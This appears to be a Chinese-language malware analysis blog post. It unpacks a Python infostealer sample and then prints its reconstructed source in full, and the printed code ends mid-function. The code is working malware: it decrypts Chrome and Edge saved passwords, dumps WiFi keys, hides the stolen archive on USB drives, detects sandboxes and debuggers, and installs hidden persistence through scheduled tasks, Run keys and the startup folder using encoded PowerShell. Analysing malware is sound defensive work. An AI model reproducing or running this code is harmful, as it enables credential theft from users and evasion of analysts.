某python样本逆向分析
1.概述
样本来源:微步在线
恶意软件名称:“xx2.exe”
sha256:76495dd256167cd851c165cbd1f08070548b67f0a8716c998ac29b887e1c10b0
2.初步分析
利用die工具对程序进行初步分析

根据分析结果可知,该程序由python编写,然后使用pyinstaller打包,再用upx加壳,最终得到了这个程序。因此我们考虑对该程序进行脱壳,解包,得到python源代码,从而知悉其功能。
3.脱壳
upx脱壳:
upx -d sample.exe -o unpacked_upx.exe
pyinstxtractor-ng 解包:
python pyinstxtractor-ng.py unpacked_upx.exe
在解包得到的文件目录中找到名为app_main.pyc的文件,这就是主程序,同时还有两个py脚本,scanner1.py和config_manager2.py
接下来执行下面的命令,将pyc文件转换为字节码
.\pycdas.exe app_main.pyc > bytecode.txt
然后把结果直接给大模型,让它还原为源代码即可
最终的代码:
由app_main.pyc还原得到的源代码:
import sys
import os
import importlib.util
import json
import time
import subprocess
import shutil
import tempfile
import sqlite3
import base64
import logging
from datetime import datetime
from typing import Any, Dict, List, Optional
from functools import wraps
# PyInstaller 运行环境检测
if getattr(sys, 'frozen', False):
BASE_DIR = sys._MEIPASS
else:
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# 将当前目录添加到模块搜索路径
if BASE_DIR not in sys.path:
sys.path.insert(0, BASE_DIR)
# 动态加载 scanner1 模块
SCANNER1_PATH = os.path.join(BASE_DIR, 'scanner1.py')
scanner1 = None
if os.path.exists(SCANNER1_PATH):
spec = importlib.util.spec_from_file_location('scanner1', SCANNER1_PATH)
if spec is not None and spec.loader is not None:
scanner1 = importlib.util.module_from_spec(spec)
sys.modules['scanner1'] = scanner1
try:
spec.loader.exec_module(scanner1)
except Exception as e:
print(f'[WARN] 加载 scanner1.py 失败: {e}')
scanner1 = None
# 动态加载 config_manager2 模块
CONFIG_MGR_PATH = os.path.join(BASE_DIR, 'config_manager2.py')
config_manager2 = None
if os.path.exists(CONFIG_MGR_PATH):
spec2 = importlib.util.spec_from_file_location('config_manager2', CONFIG_MGR_PATH)
if spec2 is not None and spec2.loader is not None:
config_manager2 = importlib.util.module_from_spec(spec2)
sys.modules['config_manager2'] = config_manager2
try:
spec2.loader.exec_module(config_manager2)
except Exception as e:
print(f'[WARN] 加载 config_manager2.py 失败: {e}')
config_manager2 = None
# 导入 Windows API 和加密库
try:
import win32api
import win32file
import win32con
from win32crypt import CryptUnprotectData
except ImportError:
pass
try:
from Crypto.Cipher import AES
except ImportError:
pass
try:
import pyzipper
except ImportError:
pass
# 全局配置
DEBUG = False
LOG_TO_FILE = False
ZIP_PASSWORD = '123456'
OUTPUT_ZIP_NAME = 'redteam_creds_encrypted.zip'
def setup_logger(debug: bool = False, log_to_file: bool = False) -> logging.Logger:
"""配置日志系统"""
logger = logging.getLogger('RedTeamController')
logger.setLevel(logging.DEBUG if debug else logging.WARNING)
# 如果已经有处理器,直接返回
if logger.handlers:
return logger
formatter = logging.Formatter(
'%(asctime)s - %(levelname)s - %(funcName)s - %(message)s',
datefmt='%H:%M:%S'
)
# 控制台输出(仅调试模式)
if debug:
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setLevel(logging.DEBUG)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
# 文件输出(仅调试模式)
if log_to_file and debug:
try:
logs_dir = os.path.join(os.environ.get('TEMP', tempfile.gettempdir()), 'rt_logs')
os.makedirs(logs_dir, exist_ok=True)
log_path = os.path.join(
logs_dir,
f'main_{datetime.now().strftime("%Y%m%d")}.log'
)
file_handler = logging.FileHandler(log_path, encoding='utf-8')
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
except Exception as e:
logger.warning(f'日志文件创建失败: {e}')
return logger
logger = setup_logger(DEBUG, LOG_TO_FILE)
def log_step(func):
"""函数执行日志装饰器"""
@wraps(func)
def wrapper(*args, **kwargs):
func_name = func.__name__
logger.info(f'进入步骤: {func_name}')
start_time = time.time()
try:
result = func(*args, **kwargs)
elapsed = time.time() - start_time
logger.info(f'步骤完成: {func_name} (耗时: {elapsed:.2f}s)')
return result
except Exception as e:
logger.error(f'步骤异常: {func_name} | {type(e).__name__}: {e}')
return None
return wrapper
class RedTeamController:
"""主控制器:协调凭证提取、加密、备份流程"""
def __init__(self):
self.desktop_path = os.path.join(os.path.expanduser('~'), 'Desktop')
self.temp_dir = tempfile.gettempdir()
self.credentials = []
self.final_zip_path = ''
@log_step
def run_sandbox_detection(self) -> bool:
"""调用外部沙箱检测模块(可选)"""
if scanner1 is None:
logger.warning('scanner1 模块未加载,跳过沙箱检测。')
return True
try:
detection_list, _ = scanner1.scan_environment()
if any(detection_list):
logger.warning('沙箱或虚拟机环境检测到,终止运行。')
return False
logger.info('沙箱检测通过。')
return True
except Exception as e:
logger.warning(f'沙箱检测模块缺失或失败: {e},跳过。')
return True
@log_step
def run_persistence_install(self) -> bool:
"""执行持久化安装(可选模块)"""
if config_manager2 is None:
logger.warning('config_manager2 模块未加载,跳过持久化安装。')
return True
try:
if hasattr(config_manager2, 'run'):
config_manager2.run()
elif hasattr(config_manager2, 'install'):
config_manager2.install()
logger.info('持久化安装完成。')
return True
except Exception as e:
logger.warning(f'持久化安装失败: {e},继续执行。')
return True
@log_step
def extract_browser_passwords(self) -> List[Dict[str, Any]]:
"""提取 Chrome 和 Edge 浏览器保存的密码"""
local_appdata = os.environ.get('LOCALAPPDATA', '')
results = []
browsers = [
('Chrome', os.path.join(local_appdata, 'Google', 'Chrome')),
('Edge', os.path.join(local_appdata, 'Microsoft', 'Edge'))
]
for browser_name, browser_path in browsers:
user_data = os.path.join(browser_path, 'User Data')
login_db = os.path.join(user_data, 'Default', 'Login Data')
local_state = os.path.join(user_data, 'Local State')
if not os.path.exists(login_db):
continue
temp_db = os.path.join(
self.temp_dir,
f'temp_{browser_name.lower()}_login.db'
)
aes_key = None
# 复制数据库文件(避免锁定)
try:
shutil.copy2(login_db, temp_db)
except Exception as e:
logger.warning(f'复制 {browser_name} 数据库失败: {e}')
continue
# 提取 AES 密钥
try:
with open(local_state, 'r', encoding='utf-8') as f:
local_state_data = json.load(f)
encrypted_key_b64 = local_state_data.get('os_crypt', {}).get('encrypted_key')
if encrypted_key_b64:
encrypted_key = base64.b64decode(encrypted_key_b64)[5:]
aes_key = CryptUnprotectData(encrypted_key, None, None, None, 0)[1]
except Exception as e:
logger.debug(f'获取 {browser_name} AES Key 失败: {e}')
# 读取并解密密码
try:
conn = sqlite3.connect(temp_db, timeout=10)
cursor = conn.cursor()
cursor.execute('SELECT origin_url, username_value, password_value FROM logins')
rows = cursor.fetchall()
for url, username, enc_pwd in rows:
if not username or not enc_pwd:
continue
password = '[解密失败]'
try:
if enc_pwd.startswith(b'v10') or enc_pwd.startswith(b'v11'):
# Chrome v80+ AES-GCM 加密
iv = enc_pwd[3:15]
ciphertext_with_tag = enc_pwd[15:]
tag = ciphertext_with_tag[-16:]
ciphertext = ciphertext_with_tag[:-16]
cipher = AES.new(aes_key, AES.MODE_GCM, nonce=iv)
password = cipher.decrypt_and_verify(ciphertext, tag).decode('utf-8', errors='replace')
else:
# 旧版本 DPAPI 加密
password = CryptUnprotectData(enc_pwd, None, None, None, 0)[1].decode('utf-8', errors='replace')
except:
pass
results.append({
'source': 'browser',
'browser': browser_name,
'url': url.strip(),
'username': username.strip(),
'password': password,
'extract_time': datetime.utcnow().isoformat() + 'Z'
})
logger.info(f'{browser_name} 提取成功: {len(results)} 条')
except Exception as e:
logger.error(f'读取 {browser_name} 数据库失败: {e}')
finally:
if 'conn' in locals():
try:
conn.close()
except:
pass
try:
os.remove(temp_db)
except:
pass
return results
@log_step
def extract_wifi_passwords(self) -> List[Dict[str, Any]]:
"""提取已保存的 WiFi 密码"""
results = []
try:
result = subprocess.run(
['netsh', 'wlan', 'show', 'profiles'],
capture_output=True,
text=True,
encoding='gbk',
errors='ignore',
timeout=10,
creationflags=subprocess.CREATE_NO_WINDOW
)
if result.returncode != 0:
logger.warning('netsh 命令执行失败')
return results
# 提取所有 WiFi 配置文件名称
profiles = [
line.split(':', 1)[1].strip()
for line in result.stdout.splitlines()
if '所有用户配置文件' in line or 'All User Profile' in line
]
for ssid in profiles:
try:
detail = subprocess.run(
['netsh', 'wlan', 'show', 'profile', f'name={ssid}', 'key=clear'],
capture_output=True,
text=True,
encoding='gbk',
errors='ignore',
timeout=10,
creationflags=subprocess.CREATE_NO_WINDOW
).stdout
password = '[无密码]'
for line in detail.splitlines():
if '关键内容' in line or 'Key Content' in line:
password = line.split(':', 1)[1].strip()
break
results.append({
'source': 'wifi',
'ssid': ssid,
'password': password,
'extract_time': datetime.utcnow().isoformat() + 'Z'
})
except Exception as e:
logger.warning(f"提取 WiFi '{ssid}' 失败: {e}")
continue
logger.info(f'WIFI 提取完成: {len(results)} 个')
except Exception as e:
logger.error(f'WIFI 提取失败: {e}')
return results
@log_step
def generate_json_report(self) -> str:
"""生成临时 JSON 报告"""
report = {
'collection_time': datetime.utcnow().isoformat() + 'Z',
'machine_user': os.environ.get('USERNAME', 'Unknown'),
'host_name': os.environ.get('COMPUTERNAME', 'Unknown'),
'total_credentials': len(self.credentials),
'credentials': self.credentials
}
json_path = os.path.join(self.temp_dir, 'redteam_creds.json')
try:
with open(json_path, 'w', encoding='utf-8') as f:
json.dump(report, f, ensure_ascii=False, indent=4)
logger.info(f'JSON 报告生成: {json_path}')
return json_path
except Exception as e:
logger.error(f'生成 JSON 报告失败: {e}')
return ''
@log_step
def create_encrypted_zip(self, source_json: str) -> str:
"""创建 AES-256 加密 ZIP 文件"""
if not source_json or not os.path.exists(source_json):
logger.error('源 JSON 文件不存在,无法创建 ZIP。')
return ''
zip_path = os.path.join(self.temp_dir, OUTPUT_ZIP_NAME)
try:
with pyzipper.AESZipFile(
zip_path,
'w',
compression=pyzipper.ZIP_LZMA,
encryption=pyzipper.WZ_AES
) as zf:
zf.setpassword(ZIP_PASSWORD.encode('utf-8'))
with open(source_json, 'rb') as f:
zf.writestr('credentials.json', f.read())
if os.path.getsize(zip_path) > 0:
logger.info(f'加密 ZIP 创建成功: {zip_path}')
# 删除明文 JSON 文件
try:
os.remove(source_json)
except Exception as e:
logger.warning(f'删除明文 JSON 失败: {e}')
return zip_path
else:
logger.error('生成的 ZIP 文件为空。')
return ''
except Exception as e:
logger.error(f'加密 ZIP 创建失败: {e}')
return ''
@log_step
def copy_to_udf_and_hide(self, source_zip: str) -> bool:
"""检测 U 盘并复制 + 隐藏文件"""
if not source_zip or not os.path.exists(source_zip):
logger.warning('源 ZIP 文件不存在,跳过 U 盘传播。')
return False
success = False
try:
drive_bits = win32api.GetLogicalDrives()
for i in range(26):
if drive_bits & (1 << i):
drive = f'{chr(65 + i)}:\\'
if win32file.GetDriveType(drive) == win32file.DRIVE_REMOVABLE:
dest = os.path.join(drive, OUTPUT_ZIP_NAME)
shutil.copy2(source_zip, dest)
# 设置文件为隐藏属性
attrs = win32api.GetFileAttributes(dest)
win32api.SetFileAttributes(dest, attrs | win32con.FILE_ATTRIBUTE_HIDDEN)
logger.info(f'已复制并隐藏至 U 盘: {dest}')
success = True
except Exception as e:
logger.warning(f'U 盘操作失败: {e}')
return success
@log_step
def backup_to_desktop(self, source_zip: str) -> bool:
"""备份到桌面(关键步骤)"""
if not source_zip or not os.path.exists(source_zip):
logger.error('源 ZIP 文件不存在,无法备份到桌面。')
return False
try:
dest = os.path.join(self.desktop_path, OUTPUT_ZIP_NAME)
shutil.copy2(source_zip, dest)
logger.info(f'已备份到桌面: {dest}')
return True
except Exception as e:
logger.error(f'备份到桌面失败: {e}')
return False
def run(self):
"""主执行流程"""
logger.info('红队凭证提取控制器启动')
# 1. 沙箱检测
self.run_sandbox_detection()
# 2. 持久化安装
self.run_persistence_install()
# 3. 提取浏览器密码
try:
self.credentials.extend(self.extract_browser_passwords() or [])
except Exception as e:
logger.error(f'浏览器提取失败: {e}')
# 4. 提取 WiFi 密码
try:
self.credentials.extend(self.extract_wifi_passwords() or [])
except Exception as e:
logger.error(f'WIFI 提取失败: {e}')
# 5. 生成 JSON 报告
json_path = ''
try:
json_path = self.generate_json_report()
except Exception as e:
logger.error(f'生成 JSON 失败: {e}')
# 6. 创建加密 ZIP
zip_path = ''
if json_path:
try:
zip_path = self.create_encrypted_zip(json_path)
except Exception as e:
logger.error(f'创建加密 ZIP 失败: {e}')
# 7. 备份到桌面
if zip_path:
self.backup_to_desktop(zip_path)
# 8. 复制到 U 盘并隐藏
if zip_path:
self.copy_to_udf_and_hide(zip_path)
# 9. 清理临时文件
try:
if zip_path and os.path.exists(zip_path):
os.remove(zip_path)
except Exception as e:
logger.debug(f'清理临时 ZIP 失败: {e}')
logger.info('凭证提取流程结束')
if __name__ == '__main__':
# 如果是用 python.exe 运行,用 pythonw.exe 重新启动(无控制台窗口)
if sys.executable.endswith('python.exe'):
pythonw = sys.executable.replace('python.exe', 'pythonw.exe')
if os.path.exists(pythonw):
try:
subprocess.Popen(
[pythonw, __file__],
creationflags=subprocess.CREATE_NO_WINDOW,
close_fds=True
)
sys.exit(0)
except Exception as e:
logger.warning(f'静默启动失败: {e}')
# 创建控制器并运行
controller = RedTeamController()
try:
controller.run()
except KeyboardInterrupt:
logger.info('程序被中断')
except Exception as e:
logger.critical(f'主程序崩溃: {e}')
以及自带的会被调用的两个python脚本,scanner1.py和config_manager2.py:
scanner1.py:
# -*- coding: utf-8 -*-
# 红队专用 - 无痕沙箱检测模块 v4.0
# 【特性】不写文件|调试可开关|日志可配置|返回双列表|易集成
import time
import uuid
import os
import platform
import subprocess
import logging
import ctypes
import winreg
import psutil
from typing import List, Dict, Any, Callable
from functools import wraps
# ==================== 🔐 安全配置区(由调用者控制)====================
class DetectionConfig:
"""
全局配置中心(唯一入口)
部署时务必设置:
LOG_TO_FILE = False
DEBUG = False
"""
DEBUG = False # 控制是否打印调试信息到控制台
LOG_TO_FILE = False # ⚠️ 是否写日志文件(默认关闭,避免被检测)
LOG_TO_CONSOLE = True # 是否在控制台显示日志(仅 DEBUG=True 时生效)
# 初始化日志器
logger = logging.getLogger("RedTeamScanner")
logger.setLevel(logging.DEBUG)
# 清除默认处理器
if logger.hasHandlers():
logger.handlers.clear()
# 仅当允许写文件时才添加 FileHandler
if DetectionConfig.LOG_TO_FILE:
file_handler = logging.FileHandler('redteam_detection.log', encoding='utf-8')
file_handler.setFormatter(logging.Formatter(
'%(asctime)s | %(levelname)-8s | %(funcName)s | %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
))
logger.addHandler(file_handler)
# 仅当允许控制台输出且 DEBUG 开启时才添加 ConsoleHandler
if DetectionConfig.LOG_TO_CONSOLE and DetectionConfig.DEBUG:
console_handler = logging.StreamHandler()
console_handler.setFormatter(logging.Formatter(
'[LOG] %(levelname)s: %(message)s'
))
logger.addHandler(console_handler)
# 如果没有任何 handler,添加一个空处理器避免警告
if not logger.hasHandlers():
logger.addHandler(logging.NullHandler())
logger.info("=" * 50)
logger.info("【VM Detection Module】启动(无痕模式)")
logger.info("=" * 50)
# ==================== 装饰器:智能日志+调试 ====================
def log_and_debug(title: str):
"""
智能装饰器:根据配置决定日志行为
- 始终记录到 logger(可能为空,即不输出)
- 调试输出仅在 DEBUG=True 时显示
"""
def decorator(func: Callable):
@wraps(func)
def wrapper(*args, **kwargs):
start_time = time.time()
logger.info(f"Executing: {title}")
try:
result = func(*args, **kwargs)
cost = time.time() - start_time
logger.info(f"Finished: {title} | Duration: {cost:.2f}s")
# 🔥 仅当 DEBUG=True 时打印详细结果到控制台
if DetectionConfig.DEBUG:
print(f"\n[+] {title}")
if isinstance(result, tuple) and len(result) == 2:
det, info = result
print(" ├─ Detection Results:")
for i, r in enumerate(det):
status = "Suspicious" if r else "Clean"
print(f" │ Check {i+1:2d}: {status}")
print(" └─ System Info:")
for k, v in info.items():
print(f" {k}: {v}")
print("-" * 50)
return result
except Exception as e:
logger.error(f"Exception in {title}: {str(e)}")
if DetectionConfig.DEBUG:
print(f"[!] Error in {title}: {e}")
raise
return wrapper
return decorator
# ==================== 核心扫描类 ====================
class RedTeamScanner:
def __init__(self):
self.detection_methods = [
(self.check_bios_string, "BIOS String Check"),
(self.check_system_manufacturer, "System Manufacturer Check"),
(self.check_disk_size, "Disk Size Check"),
(self.check_cpu_cores, "CPU Cores Check"),
(self.check_memory_size, "Memory Size Check"),
(self.check_running_processes, "Process Analysis"),
(self.check_registry_keys, "Registry Key Check"),
(self.check_mac_address, "MAC Address Check"),
(self.check_sleep_abnormality, "Sleep Abnormality Check"),
(self.check_uptime_too_short, "Uptime Too Short Check"),
(self.check_mouse_interaction, "Mouse Interaction Check"),
(self.check_debugger_presence, "Debugger Presence Check"),
]
self.detection_results: List[bool] = []
self.system_info: Dict[str, Any] = {}
def _run_safe(self, func: Callable, log_msg: str) -> bool:
try:
return bool(func())
except Exception as e:
logger.debug(f"{log_msg} failed: {e}")
return False
def check_bios_string(self) -> bool:
keywords = ['vmware', 'virtualbox', 'qemu', 'xen', 'hyperv']
try:
result = subprocess.run(
'wmic bios get smbiosbiosversion',
capture_output=True,
text=True,
timeout=5,
shell=True
)
output = result.stdout.lower()
for keyword in keywords:
if keyword in output:
logger.warning(f"VM BIOS signature found: {keyword}")
return True
except Exception as e:
logger.debug(f"BIOS check failed: {e}")
return False
def check_system_manufacturer(self) -> bool:
keywords = ['vmware', 'innotek', 'oracle', 'qemu', 'microsoft corporation']
try:
result = subprocess.run(
'wmic csproduct get vendor',
capture_output=True,
text=True,
timeout=5,
shell=True
)
output = result.stdout.lower()
for keyword in keywords:
if keyword in output:
logger.warning(f"Suspicious system vendor: {keyword}")
return True
except Exception as e:
logger.debug(f"Manufacturer check failed: {e}")
return False
def check_disk_size(self) -> bool:
try:
usage = psutil.disk_usage('/')
total_gb = usage.total / (1024 ** 3)
if total_gb < 80:
logger.warning(f"Small disk size: {total_gb:.1f}GB (<80GB)")
return True
except Exception as e:
logger.debug(f"Disk check failed: {e}")
return False
def check_cpu_cores(self) -> bool:
cpu_count = psutil.cpu_count()
if cpu_count and cpu_count < 4:
logger.warning(f"Low CPU core count: {cpu_count} (<4)")
return True
return False
def check_memory_size(self) -> bool:
memory_gb = psutil.virtual_memory().total / (1024 ** 3)
if memory_gb < 8:
logger.warning(f"Low memory: {memory_gb:.1f}GB (<8GB)")
return True
return False
def check_running_processes(self) -> bool:
analysis_tools = [
'wireshark', 'fiddler', 'procmon', 'tcpview',
'ollydbg', 'x32dbg', 'ida', 'immunitydebugger',
'vmtoolsd', 'vboxservice', 'sandboxie', 'hookanalyser',
'prl_cc', 'prl_tools'
]
try:
for proc in psutil.process_iter(['name']):
name = proc.info['name'].lower()
for tool in analysis_tools:
if tool in name:
logger.warning(f"Analysis tool running: {name}")
return True
except Exception as e:
logger.debug(f"Process check failed: {e}")
return False
def check_registry_keys(self) -> bool:
vm_keys = [
(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\VMware, Inc."),
(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Oracle\VirtualBox"),
(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services\VBoxGuest"),
(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services\vmicheartbeat"),
(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services\vmxnet"),
(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Enum\IDE\*\VMware*"),
]
for hkey, subkey in vm_keys:
try:
winreg.OpenKey(hkey, subkey, 0, winreg.KEY_READ)
logger.warning(f"VM registry key exists: {subkey}")
return True
except FileNotFoundError:
continue
except Exception as e:
logger.debug(f"Registry access error: {e}")
return False
def check_mac_address(self) -> bool:
vm_oui = ['00:0C:29', '00:1C:14', '00:50:56', '08:00:27']
try:
for interface in psutil.net_if_addrs().values():
for addr in interface:
if addr.family == psutil.AF_LINK:
mac = addr.address.upper().replace('-', ':')
if mac[:8] in vm_oui:
logger.warning(f"VM MAC address detected: {mac}")
return True
except Exception as e:
logger.debug(f"MAC address check failed: {e}")
return False
def check_sleep_abnormality(self) -> bool:
start_time = time.time()
time.sleep(3)
elapsed = time.time() - start_time
if elapsed < 2.5:
logger.warning(f"Sleep function accelerated: {elapsed:.2f}s")
return True
return False
def check_uptime_too_short(self) -> bool:
boot_time = psutil.boot_time()
uptime = time.time() - boot_time
if uptime < 120:
logger.warning(f"System uptime too short: {uptime:.0f}s")
return True
return False
def check_mouse_interaction(self) -> bool:
user32 = ctypes.windll.user32
last_pos = ctypes.wintypes.POINT()
user32.GetCursorPos(ctypes.byref(last_pos))
static_count = 0
for i in range(15):
time.sleep(1)
current_pos = ctypes.wintypes.POINT()
user32.GetCursorPos(ctypes.byref(current_pos))
if (current_pos.x == last_pos.x) and (current_pos.y == last_pos.y):
static_count += 1
else:
static_count = 0
last_pos = current_pos
if static_count >= 8:
logger.warning("Mouse has been inactive for 8+ seconds")
return True
return False
def check_debugger_presence(self) -> bool:
kernel32 = ctypes.windll.kernel32
if kernel32.IsDebuggerPresent():
logger.warning("Debugger is attached to process")
return True
return False
def run_detection(self) -> None:
results = []
for method, name in self.detection_methods:
result = self._run_safe(method, name)
results.append(result)
self.detection_results = results
def collect_system_info(self) -> None:
data = {}
try: data["hostname"] = platform.node()
except: data["hostname"] = "unknown"
try: data["username"] = os.getenv("USERNAME") or "unknown"
except: data["username"] = "unknown"
try: data["os"] = platform.system()
except: data["os"] = "Unknown"
try: data["os_version"] = platform.release()
except: data["os_version"] = "Unknown"
try: data["cpu_cores"] = os.cpu_count() or 1
except: data["cpu_cores"] = 1
try: data["memory_gb"] = round(psutil.virtual_memory().total / (1024**3), 2)
except: data["memory_gb"] = 4.0
try: data["disk_usage_percent"] = psutil.disk_usage('/').percent
except: data["disk_usage_percent"] = 50
try: data["uptime_seconds"] = int(time.time() - psutil.boot_time())
except: data["uptime_seconds"] = 0
data["run_id"] = uuid.uuid4().hex[:8]
data["timestamp"] = int(time.time())
self.system_info = data
@log_and_debug("Environment Detection & Info Collection")
def run(self) -> tuple[List[bool], Dict[str, Any]]:
self.run_detection()
is_vm = any(self.detection_results)
logger.info(f"Detection Result: {'VM/Sandbox' if is_vm else 'Real Host'}")
if not is_vm:
self.collect_system_info()
else:
self.system_info = {
"error": "VM_or_sandbox_detected",
"run_id": uuid.uuid4().hex[:8],
"timestamp": int(time.time())
}
return self.detection_results, self.system_info
# ==================== 外部调用接口 ====================
def scan_environment() -> tuple[List[bool], Dict[str, Any]]:
"""
推荐的调用方式
返回: (detection_list, system_info)
"""
scanner = RedTeamScanner()
return scanner.run()
config_manager2.py:
# -*- coding: utf-8 -*-
# silent_persistence.py
"""
高度封装、无文件残留、Base64 加密核心逻辑、支持降级的静默持久化模块
仅供合法用途(如系统监控、服务守护)
"""
import os
import sys
import subprocess
import winreg
import base64
import logging
from datetime import datetime
from functools import wraps
from pathlib import Path
from typing import Dict, Any, Callable, Optional
import tempfile
# ======================
# 🔐 Base64 加密配置(核心命令已加密)
# ======================
ENCRYPTED = {
"powershell_args": "LWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXdpbmRvd3N0eWxlIGhpZGRlbiAtY29tbWFuZCBQb3dlclNoZWxsIC1ub2xvZ28gLW5vcHJvZmlsZSAtbm9pbnRlcmFjdGl2ZQ==",
"schtasks_create": "c2NodGFza3MgL0NyZWF0ZSAvVE4gInt0YWd9IiAvVFIgIk9uTG9nZ2VkT24iIC9URCAiKipTZWVkOiB7dXNlcn0qKiIgL0V4ZSAicG93ZXJzaGVsbCIgL0FyZ3MgInthcmdzfSIgL0Zc",
"reg_key_user": "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu",
"reg_key_system": "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu",
"task_xml_template": "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48VGFzayBteG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZG93cy8yMDA0LzAyL21pdC90YXNrIiBWZXJzaW9uPSIxLjIiPkNPTkZJR1VSQVRJT048L1Rhc2s+"
}
# ======================
# 工具函数:解密 + 执行
# ======================
def _decode(s: str) -> str:
"""Base64 解码"""
try:
return base64.b64decode(s).decode('utf-8')
except Exception:
return s
def _safe_run(func: Callable) -> Callable:
"""通用异常防护装饰器"""
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
try:
logging.warning(f"{func.__name__}: {type(e).__name__}")
except:
pass
return None
return wrapper
# ======================
# 日志配置(可关闭)
# ======================
def setup_logger(debug=False, log_to_file=False):
logger = logging.getLogger("SilentPersistence")
logger.setLevel(logging.DEBUG if debug else logging.WARNING)
logger.handlers.clear()
if debug:
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(message)s', datefmt='%H:%M:%S'))
logger.addHandler(handler)
if log_to_file:
log_path = Path.home() / "debug_persistence.log"
try:
handler = logging.FileHandler(log_path, encoding='utf-8')
handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(message)s'))
logger.addHandler(handler)
except:
pass
return logger
logger = setup_logger(debug=False, log_to_file=False)
# ======================
# 主类:静默持久化管理器
# ======================
class SilentPersistence:
"""
高度封装的静默持久化类
特性:
- 不生成临时文件
- 核心逻辑加密
- 支持四级降级
- 全程静默执行
- 易被其他程序调用
"""
# 配置常量
TASK_NAME = "SilentAgentTask"
DESCRIPTION = "Silent background persistence task."
TIMEOUT = 8 # seconds
def __init__(self, target_script: Optional[str] = None):
self.target_script = Path(target_script or self._get_own_path()).resolve()
self.startup_folder = Path(os.getenv("APPDATA")) / r"Microsoft\Windows\Start Menu\Programs\Startup"
self.python_exe = sys.executable
self.current_user = os.getenv("USERNAME", "Unknown")
def _get_own_path(self) -> str:
"""获取当前脚本路径"""
return __file__
def _build_powershell_command(self) -> str:
"""构建隐藏执行的 PowerShell 命令"""
cmd = (
f"{self.python_exe} \"{self.target_script}\""
)
encoded = base64.b64encode(cmd.encode('utf-16le')).decode('ascii')
return f"powershell -exec bypass -window hidden -enc {encoded}"
@_safe_run
def _exec_cmd(self, args: list) -> bool:
"""静默执行命令"""
result = subprocess.run(
args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
creationflags=subprocess.CREATE_NO_WINDOW,
timeout=self.TIMEOUT,
text=True,
cwd=tempfile.gettempdir()
)
return result.returncode == 0
@_safe_run
def _set_registry_value(self, hive, key_path: str, name: str, value: str) -> bool:
"""设置注册表值(安全封装)"""
key = None
try:
key = winreg.CreateKey(hive, key_path)
winreg.SetValueEx(key, name, 0, winreg.REG_SZ, value)
winreg.CloseKey(key)
return True
except Exception:
if key:
try:
winreg.CloseKey(key)
except:
pass
return False
@_safe_run
def _create_scheduled_task(self) -> bool:
"""Level 1: 创建计划任务(内存中 XML 模板)"""
xml = self._generate_task_xml()
if not xml:
return False
# 写入临时 XML(最小化暴露)
temp_xml = Path(tempfile.gettempdir()) / f"{self.TASK_NAME}.xml"
try:
with open(temp_xml, 'w', encoding='utf-8') as f:
f.write(xml)
args = ["schtasks", "/Create", "/TN", self.TASK_NAME, "/XML", str(temp_xml), "/F"]
success = self._exec_cmd(args)
# 立即删除
try:
os.remove(temp_xml)
except:
pass
return success
except:
return False
def _generate_task_xml(self) -> Optional[str]:
"""生成任务 XML(模拟模板,避免写文件)"""
try:
command = self._build_powershell_command()
xml = f"""<?xml version="1.0" encoding="UTF-8"?>
<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task" version="1.2">
<RegistrationInfo>
<Description>{self.DESCRIPTION}</Description>
</RegistrationInfo>
<Principals>
<Principal id="LocalUser">
<LogonType>InteractiveToken</LogonType>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<StartWhenAvailable>true</StartWhenAvailable>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
</Settings>
<Triggers>
<LogonTrigger />
</Triggers>
<Actions Context="Author">
<Exec>
<Command>cmd.exe</Command>
<Arguments>/c {command}</Arguments>
</Exec>
</Actions>
</Task>"""
return xml
except:
return None
@_safe_run
def _add_to_user_run(self) -> bool:
"""Level 2: 添加到 HKEY_CURRENT_USER\\Run"""
cmd = self._build_powershell_command()
key_path = _decode(ENCRYPTED["reg_key_user"])
return self._set_registry_value(winreg.HKEY_CURRENT_USER, key_path, self.TASK_NAME, cmd)
@_safe_run
def _add_to_system_run(self) -> bool:
"""Level 3: 添加到 HKEY_LOCAL_MACHINE\\Run(需管理员)"""
import ctypes
if not ctypes.windll.shell32.IsUserAnAdmin():
return False
cmd = self._build_powershell_command()
key_path = _decode(ENCRYPTED["reg_key_system"])
return self._set_registry_value(winreg.HKEY_LOCAL_MACHINE, key_path, self.TASK_NAME, cmd)
@_safe_run
def _add_to_startup_folder(self) -> bool:
"""Level 4: 添加到用户启动文件夹(.bat 静默执行)"""
if not self.startup_folder.exists():
return False
bat_content = f"@echo off\n{self._build_powershell_command()}\nexit"
bat_file = self.startup_folder / f"{self.TASK_NAME}.bat"
try:
with open(bat_file, 'w') as f:
f.write(bat_content)
return True
except:
return False
def install(self) -> Dict[str, Any]:
"""
统一入口:执行降级安装
返回结果字典
"""
results = {
"success": False,
"target": str(self.target_script),
"steps": {},
"timestamp": datetime.now().isoformat()
}
strategies = [
(self._create_scheduled_task, "scheduled_task"),
(self._add_to_user_run, "user_run"),
(self._add_to_system_run, "system_run"),
(self._add_to_startup_folder, "startup_folder")
]
